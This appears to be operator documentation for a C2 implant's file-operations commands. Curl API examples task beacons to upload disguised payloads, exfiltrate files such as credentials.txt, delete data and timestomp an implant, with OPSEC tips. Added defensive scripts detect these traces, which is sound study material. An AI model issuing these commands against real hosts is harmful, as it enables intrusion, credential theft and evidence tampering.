File Operations

Commands for file system interaction on the target host. All file operation commands use Win32 APIs directly (no cmd.exe spawning) for minimal OPSEC footprint, unless otherwise noted.

The implant's fileops module handles directory listings, file reads, copies, moves, deletes, uploads, downloads, and drive enumeration through native Windows API calls like CreateFileW, FindFirstFile, CopyFileW, and MoveFileExW.


Command Reference

| Command | Syntax | Description | OPSEC Impact |
|---|---|---|---|
| ls | ls [path] | List directory contents | Low |
| drives | drives | List available drives | Low |
| mkdir | mkdir <path> | Create directory | Low |
| cd | cd <directory> | Change working directory | Low |
| pwd | pwd | Print working directory | Low |
| upload | upload <local_file> <remote_path> | Upload file to target | Medium |
| download | download <file> | Download file from target | Medium |
| cp | cp <src> <dst> | Copy file | Low |
| mv | mv <src> <dst> | Move/rename file | Low |
| rm | rm <path> | Delete file or directory | Low |
| cat | cat <file> | Read file contents | Low |
| timestomp | timestomp <target> <reference> | Copy timestamps between files | Low |

Directory and Drive Commands

ls

List directory contents using FindFirstFile / FindNextFile. Returns formatted output with file sizes and last-modified timestamps. No child processes are spawned.

Task type: fileops (method: ls)

Beacon console:

ls C:\Users\Public

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "ls C:\\Users\\Public"}'

Example output:

 Directory of C:\Users\Public

01/15/2025 09:32    <DIR>    .
01/15/2025 09:32    <DIR>    ..
01/15/2025 09:32    <DIR>    Documents
12/03/2024 14:18    1048576  update.exe
01/10/2025 08:45    2304     readme.txt

Output format

Each entry shows the last-modified timestamp, size (or <DIR> for directories), and filename. The format matches Cobalt Strike's native ls output.


drives

List available logical drives and their types using GetLogicalDrives and GetDriveTypeW.

Task type: fileops (method: drives)

Beacon console:

drives

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "drives"}'

Example output:

C:  Fixed
D:  CD-ROM
E:  Network
Z:  Removable

Drive types: Fixed, Removable, Network, CD-ROM, RAM Disk, Unknown.


mkdir

Create a directory using CreateDirectory.

Task type: fileops (method: mkdir)

Beacon console:

mkdir C:\Users\Public\staging

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "mkdir C:\\Users\\Public\\staging"}'

cd

Change the beacon's working directory. This is a process-level operation using os.Chdir -- it affects subsequent commands that use relative paths.

Task type: Process-level (beacon state)

Beacon console:

cd C:\Users\Public

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cd C:\\Users\\Public"}'

pwd

Print the beacon's current working directory. Uses os.Getwd at the beacon process level.

Task type: Process-level (beacon state)

Beacon console:

pwd

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "pwd"}'

File Transfer Commands

upload

Upload a file from the operator's machine to the target host. The backend reads the file, base64-encodes it, and dispatches a fileops task with method upload. The implant decodes the content and writes it using CreateFileW / WriteFile with CREATE_ALWAYS disposition.

Task type: fileops (method: upload)

Dedicated endpoint: POST /api/v1/cockpit/file/upload (multipart form)

Beacon console:

upload /tmp/payload.exe C:\Users\Public\update.exe

API (dedicated upload endpoint):

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/upload" \
  -H "Authorization: Bearer $TOKEN" \
  -F "beacon_id=$BEACON_ID" \
  -F "dest_path=C:\Users\Public\update.exe" \
  -F "file=@/tmp/payload.exe"

Chunked upload: Files larger than 512KB are automatically split into chunks. The first chunk uses the fileops upload method (creates the file), and subsequent chunks use PowerShell [IO.File]::OpenWrite to append data. A final verification task computes the SHA256 hash on the target to confirm integrity.

Transfer acceleration: The beacon's sleep interval is temporarily reduced to 1 second during file transfers for faster throughput, then restored to the original value after completion.

OPSEC

  • Writes a file to disk on the target -- subject to AV/EDR file scanning
  • Large files generate multiple C2 channel round-trips (visible in network traffic)
  • Chunked uploads use PowerShell for append operations, which may trigger script logging
  • MITRE ATT&CK: T1105 (Ingress Tool Transfer)
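The chunked-upload path described above is the one place this command set leaves a PowerShell trace: every chunk after the first is an [IO.File]::OpenWrite append, so script block logging records a burst of near-identical blocks writing to the same path. The following detection is an added example written for this page from the defender's side; it is not part of the project. It runs over constructed events shaped like Microsoft-Windows-PowerShell/Operational Event ID 4104 records (the script text is illustrative, not the project's actual upload stub), groups OpenWrite blocks by host and target path, and alerts when several land on one path inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the append idiom the page attributes to chunked uploads and captures
# the target path. Both [IO.File] and [System.IO.File] spellings are accepted.
OPENWRITE_RE = re.compile(
    r"\[(?:System\.)?IO\.File\]::OpenWrite\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
BASE64_RE = re.compile(r"\[Convert\]::FromBase64String", re.IGNORECASE)

# Constructed sample events (hypothetical host, times and script text) shaped
# like Event ID 4104 script block logging output.
SAMPLE_EVENTS = [
    {"time": "2025-01-15T09:30:00", "host": "WS01",
     "script": r"Get-ChildItem C:\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"time": "2025-01-15T09:41:02", "host": "WS01",
     "script": r"$fs=[IO.File]::OpenWrite('C:\Users\Public\update.exe');$fs.Seek(0,'End')|Out-Null;"
               r"$b=[Convert]::FromBase64String('QUJD');$fs.Write($b,0,$b.Length);$fs.Close()"},
    {"time": "2025-01-15T09:41:05", "host": "WS01",
     "script": r"$fs=[IO.File]::OpenWrite('C:\Users\Public\update.exe');$fs.Seek(0,'End')|Out-Null;"
               r"$b=[Convert]::FromBase64String('REVG');$fs.Write($b,0,$b.Length);$fs.Close()"},
    {"time": "2025-01-15T09:41:08", "host": "WS01",
     "script": r"$fs=[IO.File]::OpenWrite('C:\Users\Public\update.exe');$fs.Seek(0,'End')|Out-Null;"
               r"$b=[Convert]::FromBase64String('R0hJ');$fs.Write($b,0,$b.Length);$fs.Close()"},
    # A lone OpenWrite from an admin script: one block, no base64 decode.
    {"time": "2025-01-15T11:00:00", "host": "WS01",
     "script": r"$f=[IO.File]::OpenWrite('C:\Temp\report.bin');$f.Write($bytes,0,$bytes.Length);$f.Close()"},
]


def detect_chunked_appends(events, window=timedelta(minutes=5), min_blocks=2):
    """Group OpenWrite script blocks by (host, target path) and alert when at
    least `min_blocks` of them fall on the same path within `window`."""
    groups = defaultdict(list)
    for ev in events:
        match = OPENWRITE_RE.search(ev["script"])
        if not match:
            continue
        key = (ev["host"], match.group(1).lower())
        groups[key].append((datetime.fromisoformat(ev["time"]),
                            bool(BASE64_RE.search(ev["script"]))))

    alerts = []
    for (host, path), hits in groups.items():
        hits.sort()
        # Largest number of hits inside any window of the configured width.
        best, start = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_blocks:
            alerts.append({
                "host": host, "path": path, "blocks": best,
                "first_seen": hits[0][0], "last_seen": hits[-1][0],
                # Base64 decoding in the same block raises confidence that the
                # appended bytes arrived over a C2 channel rather than from disk.
                "base64_decode": any(b64 for _, b64 in hits),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_chunked_appends(SAMPLE_EVENTS):
        print(f"{alert['host']}: {alert['blocks']} OpenWrite appends to {alert['path']} "
              f"between {alert['first_seen']} and {alert['last_seen']} "
              f"(base64 decode: {alert['base64_decode']})")
```

The single report.bin block stays below the threshold, which is the intended behaviour: one OpenWrite is ordinary administration, while repeated appends to the same file a few seconds apart are the signature of a transfer being reassembled on the host. Pair a hit with the transfer-acceleration cadence noted under download and with the 512KB chunk boundary when sizing the expected number of blocks.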

download

Download a file from the target host to the operator. The implant reads the file using CreateFileW / ReadFile and returns the content as base64 over the C2 channel.

Task type: fileops (method: download)

Dedicated endpoint: POST /api/v1/cockpit/file/download

Beacon console:

download C:\Users\Public\credentials.txt

API (dedicated download endpoint):

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/download" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "path": "C:\\Users\\Public\\credentials.txt"
  }'

API (shell endpoint):

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "download C:\\Users\\Public\\credentials.txt"}'

Retrieving downloaded content: After the download task completes, fetch the file binary from:

curl -s "https://stentor.app/api/v1/cockpit/file/content/$TASK_ID" \
  -H "Authorization: Bearer $TOKEN" \
  -o credentials.txt

The server decodes the base64 data, verifies the SHA256 hash, persists a download record, and serves the raw binary with Content-Disposition: attachment.

OPSEC

  • Large files generate significant C2 channel traffic (base64 encoding adds ~33% overhead)
  • File reads via CreateFileW may trigger EDR file-access telemetry
  • Transfer acceleration temporarily reduces beacon sleep to 1 second
  • MITRE ATT&CK: T1041 (Exfiltration Over C2 Channel)
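Transfer acceleration is the most network-visible side effect listed here: a beacon that normally checks in on a fixed sleep suddenly checks in every second for the duration of the transfer, then returns to its old cadence. The following is an added example written for this page from the defender's side, not part of the project. It takes the check-in timestamps for one source/destination pair (constructed here: an hour at a 60-second sleep, a transfer window at 1 second, then the cadence restored), derives a baseline interval, and reports runs of check-ins that are much tighter than that baseline.

```python
from datetime import datetime, timedelta
from statistics import median


def _constructed_checkins():
    """Constructed proxy-log timestamps for one (source, destination) pair."""
    t = datetime(2025, 1, 15, 9, 0, 0)
    times = []
    for _ in range(60):            # an hour of normal check-ins, 60 s apart
        times.append(t)
        t += timedelta(seconds=60)
    for _ in range(40):            # transfer window: sleep dropped to 1 s
        times.append(t)
        t += timedelta(seconds=1)
    for _ in range(10):            # cadence restored
        times.append(t)
        t += timedelta(seconds=60)
    return times


SAMPLE_CHECKINS = _constructed_checkins()


def find_cadence_drops(times, ratio=0.1, min_run=5):
    """Return runs of consecutive check-in intervals that are at most
    `ratio` x the median interval and span at least `min_run` intervals.

    The median is a robust baseline as long as the observation window is
    dominated by normal sleeps; use hours of traffic, not minutes.
    """
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return []
    baseline = median(gaps)
    threshold = ratio * baseline

    runs, i = [], 0
    while i < len(gaps):
        if gaps[i] > threshold:
            i += 1
            continue
        j = i
        while j < len(gaps) and gaps[j] <= threshold:
            j += 1
        if j - i >= min_run:
            runs.append({
                "start": times[i],            # first check-in of the burst
                "end": times[j],              # first check-in back at normal cadence
                "intervals": j - i,
                "fast_interval_s": median(gaps[i:j]),
                "baseline_s": baseline,
            })
        i = j
    return runs


if __name__ == "__main__":
    for run in find_cadence_drops(SAMPLE_CHECKINS):
        print(f"cadence drop {run['start']} -> {run['end']}: {run['intervals']} "
              f"check-ins at ~{run['fast_interval_s']}s (baseline {run['baseline_s']}s)")
```

The burst boundaries also bound the transfer: with the base64 overhead quoted above, the bytes moved in the window are roughly three quarters of the response volume seen over it, which helps decide whether a 1-second burst was a small cat-style read or a multi-chunk download.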

File Manipulation Commands

cp

Copy a file using CopyFileW. The destination is overwritten if it already exists (bFailIfExists = false).

Task type: fileops (method: cp)

Beacon console:

cp C:\Windows\System32\calc.exe C:\Users\Public\calc.exe

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cp C:\\Windows\\System32\\calc.exe C:\\Users\\Public\\calc.exe"}'

mv

Move or rename a file using MoveFileExW with MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED flags. The destination is overwritten if it already exists.

Task type: fileops (method: mv)

Beacon console:

mv C:\Users\Public\old_name.exe C:\Users\Public\new_name.exe

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "mv C:\\Users\\Public\\old_name.exe C:\\Users\\Public\\new_name.exe"}'

rm

Delete a file or directory. Uses DeleteFile for files and RemoveDirectory for directories. Non-empty directories are deleted recursively using FindFirstFile / FindNextFile to enumerate and remove all contents.

Task type: fileops (method: rm)

Beacon console:

rm C:\Users\Public\staging

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "rm C:\\Users\\Public\\staging"}'

OPSEC

  • File deletions are logged by EDR products monitoring filesystem activity
  • Recursive directory deletion generates multiple DeleteFile / RemoveDirectory calls
  • Deleted files may be recoverable from NTFS journal or VSS snapshots

File Inspection Commands

cat

Read file contents and return them as a string. Opens the file via CreateFileW / ReadFile and returns the raw content (not base64-encoded, unlike download).

Task type: fileops (method: cat)

Beacon console:

cat C:\Users\Public\config.txt

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "cat C:\\Users\\Public\\config.txt"}'

cat vs download

Use cat for quick inspection of small text files -- the content appears directly in the beacon console. Use download for binary files or when you need the file saved locally, as it preserves the exact bytes and verifies integrity via SHA256.


Anti-Forensics

timestomp

Copy file timestamps from a reference file to a target file using SetFileTime. This modifies the $STANDARD_INFORMATION attribute timestamps (Created, Modified, Accessed) on the target to match the reference file.

Task type: evasion (method: timestomp)

Beacon console:

timestomp C:\Users\Public\implant.exe C:\Windows\System32\notepad.exe

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "timestomp C:\\Users\\Public\\implant.exe C:\\Windows\\System32\\notepad.exe"}'

The first argument is the target file (timestamps to modify) and the second is the reference file (timestamps to copy from). After execution, the target file's Created, Modified, and Accessed times match the reference file.

OPSEC

SetFileTime modifies only the $STANDARD_INFORMATION (SI) attribute in NTFS. The $FILE_NAME (FN) attribute timestamps are maintained by the kernel and cannot be modified via user-mode APIs. Forensic tools like MFTECmd can detect timestomping by comparing SI and FN timestamps -- a mismatch is a strong indicator of tampering.

  • MITRE ATT&CK: T1070.006 (Indicator Removal: Timestomp)
  • Detection: SI vs FN timestamp mismatch in MFT analysis, NTFS journal ($UsnJrnl) entries
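The SI-versus-FN comparison described above is simple enough to automate over an MFT parser's output. The following is an added example written for this page, not part of the project or of MFTECmd. It runs over constructed entries (hypothetical paths and times) carrying both $STANDARD_INFORMATION and $FILE_NAME timestamps, and flags any entry whose SI creation time predates its FN creation time, which is exactly what a SetFileTime backdate leaves behind.

```python
from datetime import datetime, timedelta

# Constructed sample entries shaped like the per-file output of an MFT parser
# such as MFTECmd: $STANDARD_INFORMATION (si_*) and $FILE_NAME (fn_*) times.
# The implant.exe entry mimics the result of the timestomp command above:
# SI copied from a system binary, FN untouched.
SAMPLE_MFT = [
    {"path": r"C:\Users\Public\readme.txt",
     "si_created": "2025-01-10T08:45:12", "si_modified": "2025-01-10T08:45:12",
     "fn_created": "2025-01-10T08:45:12", "fn_modified": "2025-01-10T08:45:12"},
    # Legitimately copied file: SI modified is inherited from the source and
    # so predates creation. This is normal and must not be flagged.
    {"path": r"C:\Users\Public\calc.exe",
     "si_created": "2025-01-15T09:32:00", "si_modified": "2023-04-02T11:00:00",
     "fn_created": "2025-01-15T09:32:00", "fn_modified": "2025-01-15T09:32:00"},
    # Timestomped file: SI backdated with SetFileTime, FN still records the
    # real creation time on this volume.
    {"path": r"C:\Users\Public\implant.exe",
     "si_created": "2019-12-07T09:14:52", "si_modified": "2019-12-07T09:14:52",
     "fn_created": "2025-01-15T09:40:03", "fn_modified": "2025-01-15T09:40:03"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_timestomped(records, tolerance=timedelta(seconds=2)):
    """Flag entries whose SI creation time is earlier than the FN creation time.

    At creation NTFS seeds both attributes with the same value, and user-mode
    SetFileTime only rewrites SI, so an SI creation time that predates FN
    creation means SI was backdated (T1070.006). `tolerance` absorbs
    timestamp-granularity differences between the two attributes.
    """
    hits = []
    for rec in records:
        si_created, fn_created = _ts(rec["si_created"]), _ts(rec["fn_created"])
        if si_created + tolerance < fn_created:
            hits.append({
                "path": rec["path"],
                "si_created": rec["si_created"],
                "fn_created": rec["fn_created"],
                "backdated_by": fn_created - si_created,
            })
    return hits


if __name__ == "__main__":
    for hit in find_timestomped(SAMPLE_MFT):
        print(f"{hit['path']}: SI created {hit['si_created']} but FN created "
              f"{hit['fn_created']} (backdated by {hit['backdated_by']})")
```

Only the creation pair is compared on purpose: a file copied with cp keeps the source's SI modified time while receiving a fresh creation time, so comparing SI modified against FN created would flag every ordinary copy. An SI creation time that is older than the FN creation time has no such benign explanation, and the $UsnJrnl entry for the SetFileTime update gives the corroborating timeline.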

File Browse API

The dedicated file browser endpoint provides structured directory listings for the UI file browser panel.

Endpoint: POST /api/v1/cockpit/file/browse

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/browse" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "path": "C:\\"
  }'

This dispatches a collect task with method dirlist to the beacon, which returns structured directory data for the UI to render as a file tree.


Transfer Management

Active Transfers

List all in-progress file transfers, optionally filtered by beacon:

curl -s "https://stentor.app/api/v1/cockpit/file/active?beacon_id=$BEACON_ID" \
  -H "Authorization: Bearer $TOKEN"

Cancel Downloads

Cancel in-progress downloads matching a wildcard pattern:

Beacon console:

cancel *.exe

API:

curl -s -X POST "https://stentor.app/api/v1/cockpit/file/cancel" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "beacon_id": "'$BEACON_ID'",
    "pattern": "*.exe"
  }'

Win32 API Reference

All file operations use Win32 APIs directly through the implant's fileops module. No cmd.exe or PowerShell processes are spawned (except for chunked upload append operations).

| Command | Win32 API | MITRE ATT&CK |
|---|---|---|
| ls | FindFirstFile / FindNextFile | T1083 (File and Directory Discovery) |
| drives | GetLogicalDrives / GetDriveTypeW | T1083 (File and Directory Discovery) |
| mkdir | CreateDirectory | -- |
| cd / pwd | os.Chdir / os.Getwd (Go stdlib) | -- |
| upload | CreateFileW / WriteFile | T1105 (Ingress Tool Transfer) |
| download | CreateFileW / ReadFile | T1041 (Exfiltration Over C2 Channel) |
| cp | CopyFileW | -- |
| mv | MoveFileExW | -- |
| rm | DeleteFile / RemoveDirectory | T1070.004 (Indicator Removal: File Deletion) |
| cat | CreateFileW / ReadFile | T1005 (Data from Local System) |
| timestomp | SetFileTime | T1070.006 (Indicator Removal: Timestomp) |